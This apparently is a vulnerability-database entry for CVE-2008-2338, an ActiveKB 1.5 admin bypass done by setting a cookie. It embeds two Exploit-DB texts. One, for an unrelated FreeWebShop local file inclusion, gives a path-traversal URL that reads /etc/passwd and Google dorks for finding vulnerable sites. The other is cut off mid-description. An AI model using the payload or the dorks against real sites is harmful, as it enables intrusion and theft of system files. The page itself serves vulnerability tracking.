CVE-2008-2338
Published: 2008-05-19
CVE-2008-2338: Interspire ActiveKB 1.5 and earlier allows remote attackers to gain privileges by setting the auth cookie to true when accessing unspecified scripts in /admin.
Priority: P3, 50 | high | 7.5 (CVSS 2.0)
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 6.36% (92.8th percentile)
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| interspire | activekb | <= 1.5 | — |
No detection rules found.
Exploit-DB
FreeWebShop.org 2.2.9 RC2 - 'lang_file' Local File Inclusion
exploitdb·2009-04-15
CVE-2009-2338 FreeWebShop.org 2.2.9 RC2 - 'lang_file' Local File Inclusion
---
=-=-local file include-=-=
script: FreeWebshop.org 2.2.9_R2
Author: ahmadbady
download from:http://chaozz.deepunder.dk/released/freewebshop/FreeWebshop.org2.2.9_R2.zip
vul: /includes/startmodules.inc.php line 31;
include ("./".$lang_file);
xpl:
/path/includes/startmodules.inc.php?lang_file=.../../../../etc/passwd
dork:
"FreeWebshop.org | This is the Footer | ©2008-2009"
"FreeWebshop.org | This is the Footer |"
# milw0rm.com [2009-04-15]
Exploit-DB
ActiveKB 1.5 - Insecure Cookie Handling/Arbitrary Admin Access
exploitdb·2008-05-14
CVE-2008-2338 ActiveKB 1.5 - Insecure Cookie Handling/Arbitrary Admin Access
---
--==+================================================================================+==--
--==+ ActiveKB <= 1.5 Insecure Cookie Handling/Arbitrary Admin Access +==--
--==+================================================================================+==--
Discovered By: t0pP8uZz
Discovered On: 14 MAY 2008
Script Download: N/A
DORK (a lot more sites, people remove dork): " ActiveKB v1.5 Copyright ©"
Vendor Has Not Been Notified!
DESCRIPTION:
ActiveKB suffers from an insecure cookie, when the admin details are checked the script creates a cookie,
to let the script know in future the user has already been checked and is admin. The thing is that, the cookie
only contains a "true" value. So this allows the remote attac
No writeups or analysis indexed.
http://secunia.com/advisories/30265
http://www.securityfocus.com/bid/29226
http://www.securitytracker.com/id?1020035
https://exchange.xforce.ibmcloud.com/vulnerabilities/42427
https://www.exploit-db.com/exploits/5616
Published: 2008-05-19